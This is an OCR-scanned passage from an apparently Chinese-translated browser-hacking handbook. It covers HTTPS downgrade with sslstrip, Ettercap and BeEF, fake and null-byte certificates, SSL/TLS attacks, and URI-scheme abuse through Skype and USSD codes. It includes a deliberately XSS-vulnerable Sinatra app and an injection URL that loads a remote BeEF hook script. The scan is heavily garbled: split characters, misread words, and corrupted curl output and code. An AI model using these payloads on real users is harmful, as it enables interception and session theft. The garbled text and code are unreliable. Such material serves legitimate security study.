那么 在 需要 攻击 这 种 HTTPS 通 信 时 ， 有 什么 技术 吗 ? 特别 是 在 Secure 标 签 的 保护 下 ， 会 话 
cookie 只 能 通过 HTTPS 提 交 的 情况 下 。 确 实 有 几 种 方法 来 对 付 HTTPS 页 面 ， 其 中 有 3 种 尤其 有 效 。 
本 节 我 们 就 来 探讨 HTTP 降 级 攻击 、 证 书 攻击 和 SSL/TLS 攻 击 。 



























































6.3.1 把 HTTPS 降级 为 HTTP 


HTTPS 加 密 的 内 容 ( 理论 上 ) 不 会 在 传输 过 程 中 泄露 ， 除 非 有 人 知道 密 钥 。 这 就 意味 着 , 通 
过 大 众 已 知 的 方法 不 能 操控 或 查看 其 通信 。 这 时 候 可 以 考虑 降级 攻击 。 

HTTP 降 级 攻击 的 目标 就 是 阻止 用 户 访问 HTTPS 站 点 ,或 者 通过 其 他 攻击 方法 把 用 户 转 到 网 
站 的 HTTP 版 上 上。 如果 能 强迫 浏览 器 访问 网 站 的 HTTP 版 而 不 是 HTTPS 版 , 就 可 以 窃听 到 网 络 通信 
了 。 有 两 种 方法 可 以 把 指向 HTTPS 的 请 求 重 写 为 指向 HTTP。 一 种 是 截获 网 络 数据 ， 重 写 请 求 。 
另 一 种 是 在 浏览 器 内 部 重 写 请 求 。 

在 线 重 写 网 络 请 求 ， 把 HTTPS 改 成 HITP， 是 降级 到 HTTP 的 最 简单 的 方法 之 一 。 有 些 Web 应 
用 在 把 浏览 器 重 定向 到 网 站 的 HTTPS 版 之 前 , 会 向 HTTP 请 求 返回 302 响 应 。 此 时 是 你 介入 的 最 佳 
时 机 。 可 以 使 用 sslstrip ”以 及 Ettercap 等 ARP 欺 骗 工具 来 实现 ， 就 像 第 2 章 “ARP 欺 骗 ” 中 介绍 的 
那样 。 过 程 相 对 简单 ， 唯 一 的 前 提 条 件 是 服务 器 与 客户 端 之 间 不 能 存在 相互 认证 ， 或 者 说 SSL 客 
户 端 认 证 。 

如 图 6-19 所 示 ， 在 截获 网 络 通信 并 检测 到 数据 后 ， 可 以 把 所 有 HTTPS 重 写 为 HITP。 此 时 ， 
HTTP/HTTPS 通 信 全 在 你 手 里 ， 可 以 看 到 本 来 加 密 的 所 有 内 容 。 这 样 目 标 就 只 能 看 到 HTTP 啊 应 ， 
没有 机 会 通过 他 们 的 浏览 器 接收 到 HTTPS 响 应 。 结 果 就 是 你 通过 HTTPS 与 服务 需 通 信 ,通过 HTTP 
与 目标 的 浏览 器 通信 ， 就 好 像 你 是 加 密 终 端 一 样 。 

使 用 sslstrip 和 Ettercap 还 有 其 他 好 处 。 比 如 , 可 以 利用 Ettercap 过 滤器 通过 其 他 方式 操纵 通信 。 
有 时 候 ，Web 应 用 开发 者 可 能 会 实现 某 些 自 定 义 的 防御 机 制 。 虽 然 不 多 见 ， 但 这 些 防 御 机 制 却 可 
能 阻挡 HTTP 降 级 。 

这 时 候 Ettercap 就 可 以 派 上 用 场 了 。 它 可 以 动态 重 写 内 容 ， 从 而 抵消 开发 者 的 防御 机 制 。 提 
升 这 种 攻击 方法 可 靠 性 的 最 简单 方法 就 是 重 写 链 接 , 指向 相应 站 点 的 一 个 恶意 副本 , 并 寄 希 望 于 
用 户 不 会 发 现 。 说 白 了 ,如果 你 并 不 会 实际 上 妨碍 用 户 看 到 自己 喜欢 的 猫咪 网 站 , 那 他 们 又 怎么 
会 注意 呢 ? 


第 二 种 HTTP 降 级 攻击 是 使 用 JavaScript 在 文档 内 部 重 写 链 接 。 目 标 是 修改 DOM, 把 所 有 指向 
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HTTPS 的 链接 改写 为 指向 HTTP。 对 于 通过 XSS 勾 连 的 网 站 ， 这 是 最 简单 的 选择 。 缺 点 是 很 多 网 
站 都 会 针对 此 类 攻击 做 好 防御 , 通过 HTTPS 发 送 受 保护 的 内 容 。 这 样 简单 重 写 内 容 的 做 法 就 会 受 





到 限制 。 


NI 


~ $ curl -v -A "Mozilla/4.8 (compatible; MSIE 8.8; Windows NT 6.1)" http://www .facebook .com 
* About to connect() to www.facebook.com port 80 (36) 

* Trying 31.13.79.65... connected 

* Connected to www.facebook.com (31.13.79.65) port 88 (49) 

> GET / HTTP/1.1 

> User-Agent: Mozilla/4.8 (compatible; MSIE 8.8; Windows NT 6.1) 

> Host: www.facebook.com 

> Accept: */* 

> 

< HTTP/1.1 208 OK 

< Cache-Control: private, no-cache, no-store, must-revalidate 

< Content-Type: text/html ;charset=utf-8 

< Expires: Sat, 61 Jan 2888 00:00:00 GMT 

< P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" 

« Pragma: no-cache 

x ¥-Content-Type-Options: nosniff 

< X-Frame-Options: DENY 

< X-UA-Compatible: IE=edge ,chrome=1 

< Set-Cookie: datr-QSObUptkHFSTc3z0uUihqs0Q; expires=Tue, 81-Dec-2015 11:53:37 GMT; path=/; domain=.facebook .com; 


httponly 

< X-FB-Debug: wtxCONc3EXya0gal2gF1yVwEaalX1KZxNSdH4 jFomYk- 
< Date: Sun, 81 Dec 2013 11:53:37 GMT 

« Connection: keep-alive 

< Content-Length: 747 

< 

<html> 


* Connection #8 to host www.facebook.com left intact 

* Closing connection #0 

«headstitle-Redirecting...«/titlez«script» script path = "M/index.php";var uri rez/^(?:(?:[^: N23) :)? (2:7 (? 
PLANS PHD EDP C [A238] Q2 NPC [A8]? Q? cH ))?/ , target, domainz ' ' swindow. location.href .replace(uri re,function(a,b,c 
:d}{var esf ,g;e-f-be(c? '? «c: ' );if (d)(d-d.replace(/^(1|N21/, ' );ged.charat (B) ;if (go "7 ' | gez 'SV Jezd.replace(/^ 
[Ves V if (et ef {if (window._script_path document .cookiez"rdirz"ewindow. script pathe"; pathz/; domainz"ewi 
ndow. Location .hostname .replace(/*.*(\.facebook’. .*)$/i, '$1');window. Location.replace(target domain«e);))) «scrip 
t><scriptowindow. Location.replace("https:\/\/www.facebook .comV/" ;«/scriptsmeta http-equivs"refresh" content-"8; 
urlshttps://www.facebook .com/" /></head><body></body></htm [E | 

-$] r1.9.3-p484 


图 6-19 ”将 Facebook 的 HTTPS 请 求 重 定向 为 HTTP 请 求 的 示例 








为 了 进一步 说 明 这 一 点 , 可 以 看 一 个 存在 XSS 漏 洞 的 示例 页 面 。 这 个 页 面 有 一 个 输入 参数 叫 
lang， 人 多 许 指定 不 同 的 语言 。 这 个 参数 可 能 被 XSS 利 用 ， 把 目标 浏览 器 勾 连 到 BeEF : 


require 
require 
require 
require 
require 


'rubygems' 
thin! 
'rack' 
'sinatra' 
'json' 


class InjectDemo « Sinatra::Base 
get "/" do 


lang 


= request['lang'] || "en US"; 


«div align=center> 
To login, go to our secure login page at 


«A HREF- 


‘https://servervictim.com/login?lang=#{lang}'> 


https://servervictim.com/login</A> 


“/divs" 
end 
end 


@routes 


= { 
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"/" => InjectDemo.new 


} 


Grack app = Rack: :URLMap.new(@routes) 
@thin = Thin::Server.new("servervictim.com", 4000, @rack_app) 


Thin: :Logging.silent = true 
Thin: :Logging.debug = false 


puts "[#{Time.now}] Thin ready" 
@thin. start 


MMant E, ADEA BeEFAVE RIS. BRUM angi kW 16-20ft zs. 


Source of: http://servervictim.com:4000/? 





<div align=center> 

To login, go to our secure login page at 

<A HREF='https://servervictim.com/login?lang=en US'> 
https://servervictim.com/login</A> 

</div> 








图 6-20 未 经 XSS 的 登录 页 面 源 


要 实现 BeEF 勾 连 , 需要 写 一 段 代码 结束 <a> 标 签 、 添 加 脚本 , 并 确保 链接 仍然 可 以 显示 出 来 。 
以 下 这 个 URL 会 把 BeEF 勾 连 代码 注入 页 面 : 


http://servervictim.com:4000/?lang='><script 
src="http://browserhacker.com:3000/hook.js"></script> 


浏览 器 被 勾 连 到 BeEF 之 后 ， 可 以 把 这 个 页 面 由 HTTPS 降 级 到 HTTP。 在 Browser 文 件 夹 下 的 
Hooked Domain 文 件 夹 中 ， 有 一 个 叫 作 Replace HREFS (HTTPS) 的 模块 。 这 个 小 模块 能 够 取得 页 
面 上 所 有 HTTPS 链 接 ， 然 后 将 它们 全 部 替换 为 HTTP 链接 ， 如 图 6-21 所 示 。 


Getting Started X|| Logs Current Browser 
Details | Logs || Commands | Rider || XssRays | Ipec 
Module Tree Module Results History Command results 


n Jul 21 2013 20:45:36 GMT-0400 (EDT) 


4 Browser (44) iun] dete. label 1 
] data: resute1 hips inks rewriten to hip 


4 Gjtoked Domain 21) O — 20107-212045 command 1 





Get Cookie 
Get Form Values 


Get Page HREFs 
Get Page HTML 
Replace HREFs 
Replace HREFs (Click 
Replace HREFs (HTTP: 














图 6-21 BeEF 中 的 HTTPS 降 级 模块 


这 个 模块 运行 之 后 , 结果 上 的 差异 对 目标 浏览 器 而 言 并 不 明显 , 因为 仅仅 是 HTTPS 被 改写 成 
了 HTTP。 敏 感 一 些 的 用 户 可 能 会 注意 窗口 左下 角 的 链接 显示 为 HTTP( 如 图 6-22 所 示 )， 而 在 查 
询 源 代码 的 时 候 ， 页 面 中 依旧 是 HTTPS。 
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To login, go to our secure login page at https://servervictim.com/login 


servervictim.com/login?lang= 


图 6-22 ”新 页 面 在 窗口 左下 角 显 示 链 接 为 HTTP 


为 了 减 小 被 发 现 的 可 能 性 , 可 以 不 重 写 href 属 性 的 内 容 , 而 是 为 相应 的 <a> 元 素 添 加 onclick 
事件 。 这 样 ， 在 用 户 把 鼠标 放 到 链接 上 的 时 候 ， 窗口 左下 角 出 现 的 就 不 是 HTTP 链 接 了 。 

这 个 例子 虽然 是 很 简单 的 , 但 对 于 存在 XSS 漏 洞 的 页 面 ， 同 样 的 攻击 都 适用 ， 而且 也 不 限于 
URL。 虽然 BeEF 不 会 自动 做 这 些 事 , 但 它 提 供 的 RAW JavaScript 模 块 可 以 把 简单 的 JavaScript 推 送 
到 目标 浏览 器 。 


6.3.2 ”攻击 证 书 


有 两 种 主要 的 攻击 证 书 的 方法 。 第 一 种 是 用 一 个 证 书 替换 另 一 个 证 书 。 这 种 方法 简单 易 操 作 ， 
但 对 目标 用 户 而 言 不 具有 隐蔽 性 。 第 三 种 稍微 复杂 一 点 ， 利 用 一 个 浏览 器 bug， 以 展示 未 被 浏览 
器 正确 信任 的 证 书 。 这 种 方法 依赖 于 浏览 器 存在 可 利用 的 证 书 处 理 程序 。 虽 然 用 户 不 会 因为 这 种 
攻击 而 收 到 通知 ， 但 实现 起 来 也 很 困难 。 

1. 使 用 假 证 书 

创建 一 个 假 证 书 很 简单 ， 很 多 攻击 工具 都 有 生成 假 证 书 的 功能 。 不 管 你 选择 使 用 代理 、 
Ettercap ， 还 是 其 他 工具 ， 思 路 都 是 一 样 的 。 你 向 目标 浏览 器 出 示 一 张 假 证 书 ， 然 后 充当 它们 之 
间 通 信 的 中 间 环 节 。 而 且 因为 证 书 是 你 创建 的 , 所 以 你 还 拥有 密 钥 。 这 样 就 可 以 解密 HTTPS 通 信 ， 
让 完全 截获 和 修改 数据 成 为 可 能 。 

这 种 方法 的 明显 缺点 是 用 户 会 看 到 一 条 弹出 消息 , 这 条 消息 告诉 用 户 证 书 对 站 点 无 效 。 使 用 
这 种 攻击 方法 的 根本 问题 ,在 于 用 户 点 击 弹 出 消息 的 时 候 会 不 会 过 脑子 。 有 些 时 候 ， 人 们 就 会 那 
么 不 管 不 顾 ， 即 使 知道 是 不 受信 任 的 证 书 也 照 点 不 误 。 如 果 有 人 肯定 说 自己 从 未 那么 干 过 , 那 他 
一 定 是 一 位 “火星 人 ”。 

2. 使 用 有 缺陷 的 证 书 验证 

另 一 种 证 书 攻击 是 利用 浏览 器 验证 证 书 时 存在 的 问题 。 这 种 攻击 方法 的 例子 在 2013 的 iPhone 
应 用 中 出 现 过 。 

Nick Arnott 发 表 的 研究 表明， 当时 很 多 流行 的 Phone 应 用 都 不 检查 证 书 是 否 有 效 。 无 论 是 
自 签名 的 证 书 , 还 是 随便 一 个 什么 证 书 , 应 用 都 不 会 警示 用 户 不 应 该 信任 该 服务 器 。 类 似 的 安全 
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问题 在 一 些 安 卓 程序 中 也 同样 存在 。 比 如 ， 斯坦福 大 学 和 奥斯汀 大 学 的 一 些 研 究 人 员 ”, 在 Chase 
移动 银行 应 用 中 也 发 现 了 类 似 缺 陷 。 利 用 这 种 证 书 处 理 上 的 漏洞 ， 只 要 提供 自 签名 的 证 书 ， 然 后 
监控 敏感 数据 的 连接 ， 就 可 以 获得 凭据 、 信 用 卡 数据 和 其 他 信息 。 

据说 最 严重 的 证 书 验 证 漏洞 是 Moxie Marlinspike 发 现 的 空 字符 利用 ”。 这 个 漏洞 是 因为 某 些 
证 书 注册 机 构 允许 在 请 求证 书 时 使 用 空 字符 。 听 起 来 虽然 没有 那么 危险 , 但 鉴于 浏览 器 使 用 基于 
C 语 言 的 字符 串 函 数 ， 不 会 额外 检查 值 ， 于 是 问题 就 严重 了 。 

当 检 查 字 符 串 的 函数 查找 数据 时 ， 数 据 中 的 空 字 符 通 常会 被 当 作 字 符 串 的 终结 符 。 比 如 ， 
“hello” 这 个 词 正 常情 况 的 表示 应 该 是 nello\0， 这 里 \0 是 空 字 符 的 转 义 序列 。 

通过 使 用 名 称 www.google.com\0.browserhacker.com 来 创建 证 书 ， 注 册 机 构 将 会 把 它 当 作 
browserhacker.com 的 一 部 分 ， 并 知道 该 域 的 拥有 者 可 以 请 求 该 域 的 证 书 。 可 是 ， 在 带 有 空 字符 前 
级 的 情况 下 , 浏览 器 验 证 请 求 时 会 将 其 成 功 验 证 为 www.google.com。 这 样 就 为 一 些 有 恶意 的 人 使 
用 空 字符 创建 证 书 假扮 合法 网 站 提供 了 可 乘 之 机 。 

由 于 证 书 来 自 受 信任 的 机 构 ,浏览 器 不 会 要 求 验证 证 书 , 也 不 会 弹出 任何 反馈 问题 的 消息 框 。 
这 个 漏洞 会 引发 SSL 窃 听 、 算 改 ， 以 及 其 他 攻击 ， 而 不 会 向 目标 报警 。 

这 些 攻击 利用 了 浏览 需 中 有 缺陷 的 证 书 处 理 漏 洞 。 虽 然 我 们 刚刚 提 到 的 这 个 漏洞 已 经 被 修复 
了 ,但 研究 者 仍然 发 现 了 其 他 实现 中 的 问题 。 总 之 ， 就 是 要 根据 自己 的 特定 情形 ， 找 到 合适 的 缺 
陷 或 漏洞 。 




















































































































6.3.3 攻击 SSL/TLS 层 


SSL (Secure Socket Layer， 安 全 套 接 字 层 ) 及 其 继承 者 TLS (Transport Layer Security, [íi 
层 安 全 )， 都 是 用 于 安全 上 网 的 加 密 协 议 。 与 许多 其 他 技术 软件 的 实现 一 样 ， 它 们 也 都 同样 存在 
相应 的 安全 问题 。 利 用 它们 存在 的 漏洞 ， 可 以 侵入 其 全 部 ( 至 少 部 分 ) 通信 渠道 。 对 SSL/TLS 层 
的 攻击 通常 在 合理 的 时 间 段 内 得 不 到 完整 的 消息 .不 过 也 没 问题 ,因为 至 少 可 以 获得 关键 的 cookie 
数据 ,或 者 其 他 稍 后 可 以 利用 进行 下 一 步 攻击 的 敏感 信息 。 在 写作 本 书 时 , 三 种 比较 有 名 的 攻击 
方法 分 别 是 BEAST2 、CRIME 和 Lucky 132。 

BEAST 攻 击 是 第 一 个 引 人 注 目的 SSL 攻 击 , 利用 了 CBC ( Cipher Block Chaining， 密 码 分 组 链 
dz ) 加 密 模 式 的 漏洞 。 通 过 利用 这 个 SSL 漏 洞 , 可 以 解密 部 分 加 密 消 息 , 速度 为 每 两 秒 一 个 分 组 。 
现实 中 运用 这 种 攻击 的 例子 针对 的 是 特定 用 户 , 需要 花 几 分 钟 时 间 获 得 很 少 一 部 分 数据 。 勤 奋 的 
攻击 者 可 以 在 数 分 钟 ( 到 数 小 时 ) 之 内 确定 一 个 会 话 cookie， 用 于 会 话 支持 。 

CRIME 攻 击 是 BEAST 攻 击 的 发 现 者 ( Juliano Rizzo 和 Thai Duong ) 随后 发 现 的 。 这 种 攻击 是 
对 BEAST 攻 击 被 遏制 之 后 的 回应 。 很 多 浏览 器 开发 团队 都 很 重视 BEAST 漏 洞 ， 把 原来 的 加 密 算 
法 改 为 基于 RC4 的 加 密 。 因 此 CRIME 攻 击 应 运 而 生 ， 专门 针对 这 种 新 算法 。 为 了 提取 数据 ， 它 利 
用 了 TLS 压 缩 的 漏洞 ,使 用 JavaScript 和 重复 的 Web 查 询 , 可 以 通过 CRIME 攻 击 逐 字 节 地 获得 数据 。 
勤奋 的 攻击 者 也 可 以 因此 获取 与 BEAST 攻 击 类 似 的 结果 。 

最 后 一 种 值得 一 提 的 攻击 是 Lucky 13 攻 击 。 这 种 攻击 采用 与 BEAST 攻 击 类 似 的 方法 。 不 过 ， 
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它 对 CBC 使 用 了 Padding Oracle ( 填充 警示 ) 攻击 ， 以 帮助 猜测 数据 。 与 BEAST 和 CRIME 非 常 类 
似 ， 使 用 JavaScript 极 大 加 快 了 速度 ， 但 仍然 只 对 个 别 目标 有 效 。 


什么 是 Padding Oracle 攻 击 


看 到 这 个 名 字 ， 有 人 可 能 会 想 ， 怎 么 可 以 通过 填充 来 攻击 Oracle 数 据 库 呢 ? 其 实 这 种 攻击 
与 Oralce 产 品 或 系统 没有 任何 关系 ， 包 括 他 们 的 数据 库 系 统 。 所 谓 Padding Oracle 攻 击 ， 只 是 解 
密 过 程 中 披露 数据 的 结果 。 虽然 披露 的 信息 不 一 定 全 是 纯 文 本 消息 , 但 有 了 时候 会 有 可 行 方式 确 
LEAS. 深入 解释 加 密 攻 击 技术 超出 了 本 书 的 范畴 ， 如果 你 想 了 解 ， 网 上 有 很 多 相关 资料 可 
以 参考 。 





























虽然 加 密 层 的 漏洞 对 于 演示 SSL/TLS 实 现 的 缺陷 很 有 用 , 但 不 太 适 合 大 规模 攻击 。 如 果 想 在 
可 以 接受 的 时 间 内 实现 这 种 攻击 , 还 需要 找到 一 些 允许 注入 JavaScript 的 漏洞 。 然而 , 如 果 你 有 耐 
心 长 期 跟踪 同一 个 目标 ， 很 有 可 能 还 会 发 现 它 的 其 他 一 些 安全 漏洞 。 


6.4 ”混用 URI 模式 


URI 模 式 是 URI 或 URL 的 第 一 部 分 ， 位 于 冒号 (: ) 前 面 。URI 模 式 在 浏览 器 里 有 双重 角色 。 
首先 ,模式 决定 了 浏览 器 使 用 的 协议 ， 比 如 FTP 或 HTTPS。 如 果 URL 以 ftp: 开 头 , 那么 浏览 器 就 会 
用 FTP 协 议 初始 化 链接 ， 而 不 会 使 用 HTTP 协 议 。 

其 次 ,模式 决定 了 浏览 器 的 本 地 行为 ， 有 时 候 也 包括 打开 一 个 新 的 应 用 。 比 如 ，mailto: 模 式 
就 会 打开 电子 邮件 客户 端 。 如 果 HTML 页 面 中 有 一 个 链接 指向 mailto:， 那 么 用 户 点 击 它 ， 浏 览 器 
就 会 打开 相应 的 外 部 应 用 ， 以 便 发 送 电 子 邮 件 。 





































































































6.4.1 滥用 iOS 


如 果 浏 览 器 使 用 特定 的 模式 在 另 一 种 应 用 中 执行 某 种 操作 , 那么 它 可 能 会 为 你 提供 一 些 攻击 
向 量 。 这 一 点 在 2010 年 Nitesh Dhanjani 发 表 的 研究 中 有 重点 阐述 ， 这 个 人 研究 是 关于 苹果 i1OS 对 URI 
模式 的 不 安全 处 理 方面 ”。 

Dhanjani 的 研究 调查 了 原生 iOS 协 议 人 处理 例 程 ， 例 如 tel: 处 理 程序 。 如 果 iOS Safari 浏 览 器 请 求 
URL， 例 如 tel:613-966-94916， 那 么 手机 应 用 就 会 启动 ， 并 提示 用 户 拨 打 提 示 的 号 码 ， 如 图 6-23 
所 示 。 

这 个 例子 并 不 足以 说 明 实 现 不 安全 ， 因 为 手机 应 用 仍 在 提示 用 户 确 认 是 否 拨打 电话 。 如 果 
运气 好 ， 那 么 目标 可 能 会 意外 地 按 下 Call 按 钮 。 不 过 这 种 可 能 性 极 小 ， 所 以 我 们 再 看 另外 一 个 
例子 。 

Skype 不 是 iOS 默 认 安 装 的 应 用 ， 它 使 用 自己 的 模式 。 为 了 允许 其 他 应 用 利用 自 定义 的 URI 
模式 ， 苹果 在 其 Info.plist 说 明 ** 中 包含 了 CFBundleURLTypes 数 组 类 型 ， 可 以 从 下 面 这 段 代码 中 
看 到 : 
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<key>CFBundleURLTypes</key> 
<array> 
<dict> 

<key>CFBundleURLName</key> 
<string>com.skype.skype</string> 

<key>CFBundl1eURLSchemes</key> 
<array> 

<string>skype</string> 





61396694916 
</array> 
</dict> Cancel Call 
</array> et 
Skype 不 仅 将 这 个 模式 暴露 给 浏览 器 , 也 接受 额外 的 ib di 
参数 。 比 如 ， 如 果 URL 后 面 追加 上 ?cal1，Skype 不 仅 会 


启动 ， 也 会 马上 尝试 拨打 相应 号 码 而 无 需 用 户 介 入 。 浏 
览 器 要 做 的 就 是 加 载 一 个 类 似 这 样 的 URL : 
skype://613-966-94916?call， 然 后 Skype 就 会 在 iOS 设 备 的 
前 台 启 动工 作 。 为 了 利用 这 个 功能 ， 可 以 在 网 页 中 加 入 
内 骨 框 架 ， 将 地 址 指向 这 个 URL。 可 以 在 https://browserhacker.com 上 的 视频 中 看 到 这 样 一 个 利用 
演示 。 

Skype 在 3.0 版 中 解决 了 这 个 问题 ， 现 在 开始 提示 用 户 是 否 要 拨打 电话 了 ， 如 图 6-24 所 示 。 

Dhanjani 的 研究 探索 了 一 些 分 析 Info.plist 文 件 的 方法 , 包括 从 越狱 的 OS 设备 中 把 它们 复制 出 
来 , 或 者 通过 iTunes 从 应 用 备份 中 提取 它们 。 要 从 iTunes 备 份 的 应 用 文件 中 提取 Info.plist 文 件 , 需 
要 以 下 几 步 。 

(1) 找到 你 想 挖 掘 的 .pa 文件 。 在 OS X 中 ， 这 种 文件 通常 位 于 ~/MusiwiTunesiTunes 
Media/Mobile Applications 目 录 下 。 在 Windows 中 ， 通 常 位 于 Ci\Users\<user>MyMusic\ iTunes 
iTunes Media\Mobile Applications\ 目 录 下 。 

(2) 复制 <application>.ipa 文 件 ， 将 其 重 命名 为 .zip 
文件 。 

(3) 解压 缩 该 文件 。 

(4) 将 其 复制 到 Payload/<application>.app/ 文 件 来。 

(5) 利用 plutil1 实 用 工具 ， 将 Info.plist 文 件 转换 为 —_ 

XML 文件 ， 比 如 : plutil -convert xmll Info.plist。 在 613-966-94916 
Windows 中 ， 可 以 在 C:\Program Files\Common Files\ Cancel Voice Call 
Apple\Apple Application Support\ 目 录 下 找到 plutilexe。 ne 
iOS 应 用 数量 庞大 , 其 中 有 些 会 引入 非常 规 的 URI 
模式 处 理 例 程 。 利 用 这 种 分 析 Info.plist 文 件 的 技术 ， 
可 以 发 现 iOS 浏 览 器 可 能 会 使 用 的 其 他 模式 。 或 许 有 的 
ee e a 以 的 
漏洞 。 624 iOS 尝试 在 Skype 中 拨打 电话 





图 6-23 ”iOS 处 理 tel: 模 式 
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6.4. 


2 混用 三 星 Galaxy 














USSD ( Unstructured Supplementary Service Data， 非 结构 化 补充 服务 数据 ), 是 GSM 蜂 窜 电 话 





























与 用 























户 的 通信 服务 商 直 接 通信 的 一 种 协议 。 这 种 服务 经 常 在 预付 费 手机 套餐 中 用 于 查询 余额 ,其 














至 用 于 给 手机 充值 。 当 然 ，USSD 还 有 其 他 用 途 ， 比 如 手机 银行 ， 甚 至 还 可 以 用 于 更 新 Twitter 和 


Facebook。 











虽然 很 多 USSD 码 可 以 打开 与 电信 服务 商 的 实时 连接 ， 但 其 中 很 多 在 手机 里 都 有 与 之 对 应 的 





特定 操作 。 比 如 ， 大 多 数 智能 手机 打开 拨号 盘 后 输入 *#06#， 有 时 候 都 不 必 点 击 拨号 键 ， 就 可 以 
显示 你 的 IMEI (International Mobile Station Equipment Identity， 国 际 移动 识别 码 )。 图 6-25 展 示 了 
在 安 草 手机 上 显示 的 IMEI， 而 图 6-26 演 示 了 iPhone 手机 上 的 相同 功能 。 























Ravishankar Borgaonkar 发 表 的 研究 , 演示 了 某 些 安里 手机 可 以 在 没有 用 户 介 入 的 情况 下 执行 





USSD”, 存在 这 个 漏洞 的 原因 是 安 卓 手机 会 处 理 tel://URI 模 式 , 与 Dhanjani 在 iOS 设 备 上 发 现 的 


























漏洞 一 样 。 不 过 , 在 安 卓 上 并 不 需要 激活 手机 应 用 并 询问 是 否 拨号 ， 而 是 会 立即 执行 USSD 操 作 。 


SOS only > 


es 
Dismiss 





6-25 ” 安 卓 IMEI 图 6-26 iPhone IMEI 








Borgaonkar 的 研究 后 来 又 发 现 了 安 卓 手机 可 以 接收 USSD 码 并 执行 的 多 种 方式 。 其 中 很 多 都 
































依赖 于 关联 应 用 的 默认 行为 。 通 常 应 用 会 检测 是 否 存 在 tel://URI 模 式 ， 然 后 简单 地 把 信息 处 理 一 


ji. 











攻击 手法 包括 : 

口 在 网 页 中 放 入 一 个 恶意 内 山 框 架 ， 让 安 章 手机 打开 特定 的 tel://USSD 码 ; 
O 在 二 维 码 里 舱 入 一 个 tel:// USSD 地 址 ; 

口 在 NFC 标 签 里 艇 入 一 个 tel:// USSD 地 址 。 
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看 到 前 面 说 到 的 执行 *#06# USSD 码 的 例子 ， 可 能 会 觉得 这 个 没 问题 没什么 大 不 了 。 在 目标 
手机 上 显示 出 IMEI 码 有 那么 重要 吗 ? 正 像 Borgaonkar 强 调 的 ， 有 些 USSD 码 可 用 于 输入 SIM 码 。 

某 些 情况 下 ， 如 果 不 正 确 地 输入 SIM 码 三 次 ，SIM 就 会 锁 住 ， 直 到 输入 正确 的 PUK (PIN 
Unlocked Key ) 码 。 如 果 不 正确 地 输入 10 次 PUK 码 ， 就 会 导致 SIM 卡 失效 ， 因 此 不 能 再 使 用 。 这 
意味 着 攻击 目标 必须 再 取得 一 个 新 SIM 卡 ， 通 常 要 花 一 些 钱 ， 而 他 们 的 手机 在 换 卡 期 间 一 般 也 就 
不 能 打 电 话 了 。 

Borgaonkar 还 演示 了 另 一 个 影响 三 星 特定 型 号 手机 的 USSD 码 , 该 USSD 码 会 导致 设备 重 置 为 
HJ i. XDA Developers 论 坛 上 维护 了 一 个 USSD 码 列表 : http://forum.xda-developers.com/ 
showthread.php?{=1953506， 大 家 可 以 参考 。 

随 着 越 来 越 多 的 应 用 会 开发 新 的 例 程 和 方法 来 处 理 自 定义 URI, 不 安全 模式 处 理 的 影响 仍然 
会 持续 。 这 里 讨论 的 例子 只 涉及 几 个 URI 模 式 。 如 果 知 道 W3C 列 出 了 150 多 个 不 同 的 模式 “,， 想必 
你 也 会 非常 惊讶 。 显 然 ， 这 对 攻击 者 而 言 构成 了 一 个 非常 大 的 攻击 面 。 


6.5 攻击 JavaScript 


Fa SR AR SE EEE Vs s A A OR, (Ee DE ARE JavaScript. 10 9&3 P AI 
JavaScript 经 历 了 巨大 的 时 代 变 迁 。 

从 Firefox 23 开 始 ， 禁 用 JavaScript 的 选项 已 经 消失 ( 但 在 about:config 中 的 javascript. enabled 标 
签 里 还 可 以 设置 ) ”。 现 在 使 用 Firefox ( 不 带 NoScript 扩 展 ) 的 普通 用 户 只 能 允许 JavaScript 运 行 。 
JavaScript 与 浏览 器 的 界限 越 来 越 模糊 了 。 

因此 , 在 讨论 浏览 器 攻击 技术 时 , 很 难 不 涉及 JavaScript。 接 下 来 几 小 节 将 介绍 涉及 JavaScript 
的 技术 。 

































































6.5.1 攻击 JavaScript 加 密 


很 多 Web 应 用 都 致力 于 实现 越 来 越 多 的 客户 端 功能 , 其 目标 是 仅 通 过 浏览 器 和 JavaScript 来 创 
建 健壮 的 应 用 。 这 意味 着 很 多 敏感 的 功能 从 Web 应 用 后 台 转 移 到 浏览 右 的 现象 不 再 罕见 。 HTML5 
的 时 代 到 来 以 后 ，WebSocket 协 议 以 及 其 他 现代 浏览 器 技术 的 逐渐 普及 ， 让 了 解 浏览 器 如 何 保 护 
数据 ， 以 及 它 如 何 与 后 端 服 务 器 传输 数据 变 得 愈 发 重要 。 

关于 JavaScript 加 密 的 一 个 主要 问题 在 于 ， 浏 览 吉 最 终 还 是 要 访问 实际 执行 加 密 的 全 部 代码 。 
尽管 模糊 JavaScript 的 技术 层出不穷 ， 但 最 终 浏览 器 还 是 要 看 这 些 代码 。 

有 人 认为 JavaScript 代 码 加 密 只 是 给 人 一 种 安全 错觉 , 因为 要 想 破 译 并 不 难 。 很 多 时 候 , 就 是 
为 加 密 技术 本 身 不 够 安全 , 攻击 就 会 针对 这 些 不 安全 的 技术 接 中 而 至 。 如 果 想 让 JavaScript 加 密 
真正 可 靠 ， 必 须 彻底 改造 加 密 技术 ,但 这 件 事 并 不 容易 。 

1. 怀疑 Web 应 用 

开发 出 健壮 的 JavaScript 加 密 技术 面临 着 一 些 障碍 , 其 中 最 主要 的 是 浏览 器 与 Web 应 用 间 信 任 
关系 的 复杂 性 。 可 以 把 它们 之 间 的 关系 定义 为 “超级 信任 关系 ”。 浏 览 器 在 某 些 情况 下 会 完全 信 
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任 Web 应 用 ， 而 在 另 一 些 情 况 下 则 只 会 部 分 信任 它 。 

一 方面 ，Web 应 用 得 不 到 浏览 器 的 充分 信任 ， 因 此 不 能 在 应 用 中 保存 敏感 数据 。 男 一 方面 ， 
浏览 器 对 于 加 密 的 JavaScript 代 码 又 会 隐 式 地 信任 。 这 样 就 会 导致 安全 方面 的 问题 。 

在 实际 地 查看 代码 之 前 ， 谁 也 不 知道 是 否 应 该 信任 Web 应 用 加 密 人 代码。 因此， 主要 问题 仍然 
还 在 ,如 果 你 不 能 信任 一 个 应 用 ,不 愿意 让 它 保 存 你 的 数据 ,那么 为 什么 会 信任 它 提供 的 JavaScript 
加 密 代 码 吗 ?对 于 实现 可 靠 的 JavaScript 加 密 技术 而 言 ， 这 一 直 都 是 一 个 尚未 解决 的 根本 问题 。 

2. 获取 密 钥 

最 古老 的 一 种 盗 取 会 话 令 牌 的 技术 就 是 使 用 XSS。 这 种 攻击 通过 注入 JavaScript 指 令 ， 来 取得 
